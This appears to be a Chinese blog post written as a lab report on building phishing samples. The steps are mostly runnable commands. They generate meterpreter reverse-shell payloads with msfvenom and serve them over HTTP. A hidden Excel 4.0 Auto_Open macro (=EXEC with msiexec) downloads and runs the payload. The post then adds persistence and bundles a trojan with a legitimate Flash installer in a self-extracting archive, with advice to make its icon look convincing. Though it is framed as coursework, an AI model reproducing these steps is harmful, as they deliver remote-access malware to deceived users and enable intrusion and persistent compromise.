社会工程学技术(钓鱼样本制作)

一、实验目的

(1)通过模拟社会工程学攻击,深入理解其原理和方法

(2)了解并掌握社会工程学攻击的常见手段和技巧

(3)掌握钓鱼样本制作的方法

二、实验任务

(1)制作恶意的excel钓鱼样本

(2)制作正常软件和恶意木马进行捆绑打包钓鱼样本

三、实验环境

1、靶机地址:192.168.195.138

2、攻击机地址:192.168.195.130

四、实验过程和实验结果

1.制作钓鱼msi文件,利用宏进行渗透

当对方启动宏代码时会尝试下载并运行msi文件从而与Kali建立对话,这里尝试了很多遍发现目标系统是Win7所以不能标注/x64而是去掉/x64,直接输入:Msfvenom -p Windows/meterpreter/reverse_tcp LHOST=Kali IP LPORT=监听端口 -f msi -o diaoyexl.msi

开启msf6,输入use exploit/multi/handler建立监听,监听ip与端口为与msi文件相同

设置完成后输入run开始监听

输入:python2 -m SimpleHTTPServer 80开启Kali HTTP 80端口服务

打开Excel2010版本,右键左下角“Sheet 1”,选择插入宏

点击A1左上角白框输入:Auto_Open后回车

在A1输入:=EXEC(“msiexec /q /i http://192.168.195.130/diaoyexl.msi”)

在A2输入:=HALT(),再次右键左下角“Sheet 1”,将宏隐藏后保存退出

将excel文件传输进靶机,打开文件,点击开启宏,宏代码开始运行

Kali接收到靶机连接申请,与其建立meterpreter对话

这里我是在已经建立meterpreter对话后输入background返回msf6

输入:use windows/local/persistence,再将你建立的meterpreter对话的session ID输入对应option中

run即可将后门文件藏入对方文件中,文件地址如图

注:后门文件在Temp文件夹中会被自动清除,暂无好方法解决

  1. 利用flash文件与钓鱼文件打包组成自解压文件,欺诈用户解压

     我们输入:msfvenom -p Windows/meterpreter/reverse_tcp  LHOST=Kali IP LPORT=监听端口

     -f exe -o flash.exe 制作钓鱼文件

再像制作宏时一样输入use exploit/multi/handler监听

     

制作好的flash.exe与正常的flash文件

     

     将两文件一同制作压缩文件,点击创建自解压格式压缩文件

     

点击高级自解压选项设置解压路径为:C:\windows\temp

设置flash.exe文件在解压前运行,正常文件解压后运行

    

文件压缩完成,可以自行设计图标使其更加逼真

    

    上传靶机,点击解压

Flash.exe运行后msf6监听成功,建立meterpreter对话,实验结束

  • 16
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值